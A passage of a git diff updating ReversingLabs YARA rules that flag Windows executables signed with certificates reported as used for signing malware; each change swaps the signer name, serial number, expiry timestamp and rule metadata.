- uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "INC SALYUT" and (pe.signatures[i].serial=="00:df:51:21:dc:99:d1:ab:6b:7e:52:29:f6:83:21:23:ef" or pe.signatures[i].serial=="df:51:21:dc:99:d1:ab:6b:7e:52:29:f6:83:21:23:ef") and 1613433600<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "AmiraCo Oy" and (pe.signatures[i].serial=="00:96:1c:ec:b0:22:78:45:31:75:49:e9:34:3a:98:0e:91" or pe.signatures[i].serial=="96:1c:ec:b0:22:78:45:31:75:49:e9:34:3a:98:0e:91") and 1615248000<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_760Cef386B63406751Ae83A9Eae92342 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_1Ef6392B2993A6F67578299659467Ea8 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "c2cbd1fd-ef68-5128-9c45-88b73a49130f" + id = "123e5aed-0ef4-5146-81bb-5d455a9cf92e" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L15426-L15442" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "43b56736afe081a1215db67b933413d7fbafbfc1be8213b330668578921ebca7" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L9534-L9550" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "f6b454a575ea7635d5edebffe3c9c83e95312ee33245e733987532348258733e" score = 75 quality = 90 tags = "INFO, FILE" @@ -21512,22 +41303,22 @@ rule REVERSINGLABS_Cert_Blocklist_760Cef386B63406751Ae83A9Eae92342 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Gidrokon LLC" and pe.signatures[i].serial=="76:0c:ef:38:6b:63:40:67:51:ae:83:a9:ea:e9:23:42" and 1601942400<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "ALUSEN d. o. o." and pe.signatures[i].serial=="1e:f6:39:2b:29:93:a6:f6:75:78:29:96:59:46:7e:a8" and 1618531200<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_5C2625Fa836A64F4882C56Cc7A45F0Ed : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_A918455C0D4Da7Ca474F41F11A7Cf38C : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "db968865-fb1e-57b5-8968-6510e83c02ac" + id = "959b10fe-fbd0-5642-a5d9-4ac2e0474666" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L15444-L15460" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "85e187684d62c33ef6f69323b837ef2d44facab8278b512d7bd6afd49eaed976" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L9552-L9570" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "ea30d85c057f9363ce29d4c024097c50a8752dd2095481181322fe5d5c92bb4b" score = 75 quality = 90 tags = "INFO, FILE" @@ -21537,22 +41328,22 @@ rule REVERSINGLABS_Cert_Blocklist_5C2625Fa836A64F4882C56Cc7A45F0Ed : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Xin Zhou" and pe.signatures[i].serial=="5c:26:25:fa:83:6a:64:f4:88:2c:56:cc:7a:45:f0:ed" and 1474416000<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "MIDDRA INTERNATIONAL CORP." and (pe.signatures[i].serial=="00:a9:18:45:5c:0d:4d:a7:ca:47:4f:41:f1:1a:7c:f3:8c" or pe.signatures[i].serial=="a9:18:45:5c:0d:4d:a7:ca:47:4f:41:f1:1a:7c:f3:8c") and 1618963200<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_7Df6Fa580F84493C414Ee0E431086737 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_936Bc256D2057Ca9B9Ec3034C3Ed0Ee6 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "27afa64e-0c9e-58ca-a4e1-db97cde66427" + id = "4dbe7db7-2f61-558c-a6dc-875ba87322c7" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L15462-L15478" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "ef244587c9eb1e1cb2f8a9c161e5dd9ff70e9764586f16e011334400ee400ed9" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L9572-L9590" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "7e90c29bcfe4632e70b61a0cf2ab48a3de986bd5c6c730f64a363f4f3d79a3f4" score = 75 quality = 90 tags = "INFO, FILE" @@ -21562,22 +41353,22 @@ rule REVERSINGLABS_Cert_Blocklist_7Df6Fa580F84493C414Ee0E431086737 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Yu Bao" and pe.signatures[i].serial=="7d:f6:fa:58:0f:84:49:3c:41:4e:e0:e4:31:08:67:37" and 1477440000<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "SALES & MAINTENANCE LIMITED" and (pe.signatures[i].serial=="00:93:6b:c2:56:d2:05:7c:a9:b9:ec:30:34:c3:ed:0e:e6" or pe.signatures[i].serial=="93:6b:c2:56:d2:05:7c:a9:b9:ec:30:34:c3:ed:0e:e6") and 1616889600<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_309D2E115F1Fe2993Ee2E063 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_Afe8Fee94B41422E01E4897Bcd52D0A4 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "7182f3f2-7b2a-5c29-b7a9-607feafbe570" + id = "83d08ca6-2a0b-5da3-8d53-7bf8bcc361cf" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L15480-L15496" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "15fdb95fe5429cdc0263615c2b7c90d21f37b52954c5ce568c1293cd3a544730" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L9592-L9610" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "02c55b182bc9843334baed9c0a7cca2c88cd1de00ca9b47b10ec79b7a5acf9bb" score = 75 quality = 90 tags = "INFO, FILE" @@ -21587,22 +41378,22 @@ rule REVERSINGLABS_Cert_Blocklist_309D2E115F1Fe2993Ee2E063 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "VANKY TECHNOLOGY LIMITED" and pe.signatures[i].serial=="30:9d:2e:11:5f:1f:e2:99:3e:e2:e0:63" and 1467102525<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "TLGM ApS" and (pe.signatures[i].serial=="00:af:e8:fe:e9:4b:41:42:2e:01:e4:89:7b:cd:52:d0:a4" or pe.signatures[i].serial=="af:e8:fe:e9:4b:41:42:2e:01:e4:89:7b:cd:52:d0:a4") and 1617062400<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_90E33C1068F54913315B6Ce9311141B9 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_718E89Ddb33257Ea77Ba74Be7F2Baf1D : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "61c5d5ed-ca2c-5f71-893b-4c933b37fa27" + id = "d173c2b2-2b76-521a-aac1-ae69fdf5b16b" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L15498-L15516" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "4a97171c6dfaa8d249ab0be1ce264b596d266ff4697d869a4d1f90cc0e2c49b7" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L9612-L9628" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "2f0defa1e1d905d937677e96f2a0955d9737f6976596932cc093fdecfea3fdb0" score = 75 quality = 90 tags = "INFO, FILE" @@ -21612,22 +41403,22 @@ rule REVERSINGLABS_Cert_Blocklist_90E33C1068F54913315B6Ce9311141B9 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "GERMES, OOO" and (pe.signatures[i].serial=="00:90:e3:3c:10:68:f5:49:13:31:5b:6c:e9:31:11:41:b9" or pe.signatures[i].serial=="90:e3:3c:10:68:f5:49:13:31:5b:6c:e9:31:11:41:b9") and 1487635200<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Trap Capital ApS" and pe.signatures[i].serial=="71:8e:89:dd:b3:32:57:ea:77:ba:74:be:7f:2b:af:1d" and 1635462927<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_3F15C3 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_4D3E38F4Aebbc32257450726B29Be117 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "10bee456-21c0-51a0-988b-43daf65e596b" + id = "173f89ca-e7b3-507b-96c1-325dd06210f8" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L15518-L15534" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "03ea946fa99ed7a6ab23cb26dbf514b6c062d63371c9e2a5ddf999acd1954955" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L9630-L9646" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "f618547942fcd9b3d1104cb5bedeecec8596fa7cc34bca838b6120085b305d73" score = 75 quality = 90 tags = "INFO, FILE" @@ -21637,22 +41428,22 @@ rule REVERSINGLABS_Cert_Blocklist_3F15C3 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Certified Software" and pe.signatures[i].serial=="3f:15:c3" and 1110577130<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "POLE & AERIAL FITNESS LIMITED" and pe.signatures[i].serial=="4d:3e:38:f4:ae:bb:c3:22:57:45:07:26:b2:9b:e1:17" and 1636123882<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_285Eccbd1D0000E640B84307Ef88Cd9F : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_8F4C49Dae1F1Ff0Ebe9104C6F73242Bd : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "4dc1523f-edc8-52e2-99aa-7389c0eb5e54" + id = "b7731056-1674-5375-a3cb-69632670d6d9" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L15536-L15552" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "267df1c327b65938b2b82a53ec8345290659560c69c9a70f2866fe7bd73513a7" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L9648-L9666" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "a8c99cc30b791a76fe3cd48184bf95ee47abb30bd200128efd2f5295ee18f7b1" score = 75 quality = 90 tags = "INFO, FILE" @@ -21662,22 +41453,22 @@ rule REVERSINGLABS_Cert_Blocklist_285Eccbd1D0000E640B84307Ef88Cd9F : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "DRAGON BUSINESS EQUIPMENT LIMITED" and pe.signatures[i].serial=="28:5e:cc:bd:1d:00:00:e6:40:b8:43:07:ef:88:cd:9f" and 1611619200<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Contact Merger Holding ApS" and (pe.signatures[i].serial=="00:8f:4c:49:da:e1:f1:ff:0e:be:91:04:c6:f7:32:42:bd" or pe.signatures[i].serial=="8f:4c:49:da:e1:f1:ff:0e:be:91:04:c6:f7:32:42:bd") and 1636039748<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_55Ab71A3F9Dde3Ef20C788Dd1D5Ff6C3 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_Ac3C05F1Cb9453De8E7110F589Fb32C0 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "c8b5b632-26e6-5a78-99be-b50b1240dbec" + id = "2578655e-6420-5a67-9116-cab5cf5bc195" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L15554-L15570" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "4bee740eaf359462cd85c6232160c6b1fc3df67acfe731da9978f0b8a304a93f" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L9668-L9686" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "6328fd5dbb497c69ddc9151f85754669760b709ecbff3e8f320a40a62ca0dd2c" score = 75 quality = 90 tags = "INFO, FILE" @@ -21687,22 +41478,22 @@ rule REVERSINGLABS_Cert_Blocklist_55Ab71A3F9Dde3Ef20C788Dd1D5Ff6C3 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Zhengzhoushi Tiekelian Information Technology Co.,Ltd" and pe.signatures[i].serial=="55:ab:71:a3:f9:dd:e3:ef:20:c7:88:dd:1d:5f:f6:c3" and 1323907200<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "TRAIN BUILDING TEAM s.r.o." and (pe.signatures[i].serial=="00:ac:3c:05:f1:cb:94:53:de:8e:71:10:f5:89:fb:32:c0" or pe.signatures[i].serial=="ac:3c:05:f1:cb:94:53:de:8e:71:10:f5:89:fb:32:c0") and 1635854205<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_4Beca26210737A5442Ff8B47 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_Fbb96A90B6718810311767Ca25Ab1E48 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "30570c07-9ba1-5b7c-a369-c6def80f9dc5" + id = "77319b9c-6075-5ac7-958c-d76916873e85" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L15572-L15588" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "7a1130413ae8807dc1ec96a6b1c3bac705a1520f7268db2848b997f6f3f9fc9b" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L9688-L9706" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "431e3364a42b272d9b71b92dee44cc185ef034a45a0b72bbda82cf7e9b29c355" score = 75 quality = 90 tags = "INFO, FILE" @@ -21712,22 +41503,22 @@ rule REVERSINGLABS_Cert_Blocklist_4Beca26210737A5442Ff8B47 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "VANKY TECHNOLOGY LIMITED" and pe.signatures[i].serial=="4b:ec:a2:62:10:73:7a:54:42:ff:8b:47" and 1476437049<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Rakurs LLC" and (pe.signatures[i].serial=="00:fb:b9:6a:90:b6:71:88:10:31:17:67:ca:25:ab:1e:48" or pe.signatures[i].serial=="fb:b9:6a:90:b6:71:88:10:31:17:67:ca:25:ab:1e:48") and 1636046757<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_0F203839A9C63B8798A7Cb31 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_Cfd38423Aef875A10B16644D058297E2 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "dc8428f3-ff28-5fcf-9855-f20c68973afe" + id = "f53e4f44-dde2-5f7a-8cab-71e91ff75d28" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L15590-L15606" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "604ba3fa671cc98e42caf80d07bc9650d193f898413517b46482f183b0f7008a" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L9708-L9726" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "a2f67cbf31c9db2891892c31a7ed4ce7eccd834bfb10ae70f58e46f8e68e7c17" score = 75 quality = 90 tags = "INFO, FILE" @@ -21737,22 +41528,22 @@ rule REVERSINGLABS_Cert_Blocklist_0F203839A9C63B8798A7Cb31 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "VANKY TECHNOLOGY LIMITED" and pe.signatures[i].serial=="0f:20:38:39:a9:c6:3b:87:98:a7:cb:31" and 1480923809<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "TRUST DANMARK ApS" and (pe.signatures[i].serial=="00:cf:d3:84:23:ae:f8:75:a1:0b:16:64:4d:05:82:97:e2" or pe.signatures[i].serial=="cf:d3:84:23:ae:f8:75:a1:0b:16:64:4d:05:82:97:e2") and 1632884040<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_Dc992Ea8E6Bb4926931Df656D5Eef8A0 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_E6C05C5A2222Bf92818324A3A7374Ad3 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "506b217e-ea82-5f14-880e-b6c0cbb001fb" + id = "2b5b79d8-e8fa-5593-b4c4-89af1f711152" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L15608-L15626" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "2b261624677a1c4a1ef539106bedcef30f272fda3d833d4c8095e9797d592e1f" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L9728-L9746" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "bea8fea49144abc109e33a5964bb8e113aa61b4cd70c72a43183cb0840429571" score = 75 quality = 90 tags = "INFO, FILE" @@ -21762,22 +41553,22 @@ rule REVERSINGLABS_Cert_Blocklist_Dc992Ea8E6Bb4926931Df656D5Eef8A0 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "MEGAPOLISELIT, OOO" and (pe.signatures[i].serial=="00:dc:99:2e:a8:e6:bb:49:26:93:1d:f6:56:d5:ee:f8:a0" or pe.signatures[i].serial=="dc:99:2e:a8:e6:bb:49:26:93:1d:f6:56:d5:ee:f8:a0") and 1497916800<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "ANAQA EVENTS LTD" and (pe.signatures[i].serial=="00:e6:c0:5c:5a:22:22:bf:92:81:83:24:a3:a7:37:4a:d3" or pe.signatures[i].serial=="e6:c0:5c:5a:22:22:bf:92:81:83:24:a3:a7:37:4a:d3") and 1634720407<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_41Bd49Bb456644D8183B3Dae72Ec8F22 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_75Ce08Bdbad44123299Dbe9D7C1D20De : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "4645eeae-2aea-59aa-a6bf-095bb9d0d711" + id = "e8e2d3b6-077f-56ba-9f2a-1941bf2ebdeb" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L15628-L15644" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "0516af7b27d244f21c9cea62fe599725d412e385e34f5f3f4f618d565365d321" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L9748-L9764" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "8ba66ab55f9a6755e11a7f39152aa26917271c7f6bc5ffdb42d07ad791fb47d7" score = 75 quality = 90 tags = "INFO, FILE" @@ -21787,22 +41578,22 @@ rule REVERSINGLABS_Cert_Blocklist_41Bd49Bb456644D8183B3Dae72Ec8F22 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Xin Zhou" and pe.signatures[i].serial=="41:bd:49:bb:45:66:44:d8:18:3b:3d:ae:72:ec:8f:22" and 1468454400<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Rose Holm International ApS" and pe.signatures[i].serial=="75:ce:08:bd:ba:d4:41:23:29:9d:be:9d:7c:1d:20:de" and 1631007095<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_A8D40Da6708679C08Aebddea6D3F6B8A : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_333705C20B56E57F60B5Eb191Eef0D90 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "a4224bf1-1875-5b2c-b79d-998d3766d163" + id = "7f98e550-fca6-564f-bbad-40e153f17adc" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L15646-L15664" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "27ec32791eaeccb8aa95d023c4fc8943f0435c32d8a17bde98d7d0b02ba17e59" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L9766-L9782" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "30eeec467b837f6b1759cd0fd6a8bc2e8942f2400df170c671287f4159652479" score = 75 quality = 90 tags = "INFO, FILE" @@ -21812,22 +41603,22 @@ rule REVERSINGLABS_Cert_Blocklist_A8D40Da6708679C08Aebddea6D3F6B8A : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "VELES LTD." and (pe.signatures[i].serial=="00:a8:d4:0d:a6:70:86:79:c0:8a:eb:dd:ea:6d:3f:6b:8a" or pe.signatures[i].serial=="a8:d4:0d:a6:70:86:79:c0:8a:eb:dd:ea:6d:3f:6b:8a") and 1547424000<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "TASK Holding ApS" and pe.signatures[i].serial=="33:37:05:c2:0b:56:e5:7f:60:b5:eb:19:1e:ef:0d:90" and 1634233052<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_307642E1F3A92C6Cc2E7Fb6E18F2Ddcb : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_A2A0Ba281262Acce7A00119E25564386 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "6dd35efb-daea-5668-a01d-f5b80371b04c" + id = "ab0c7b78-5e7e-5cb9-ae61-d88f3f8d9684" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L15666-L15682" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = 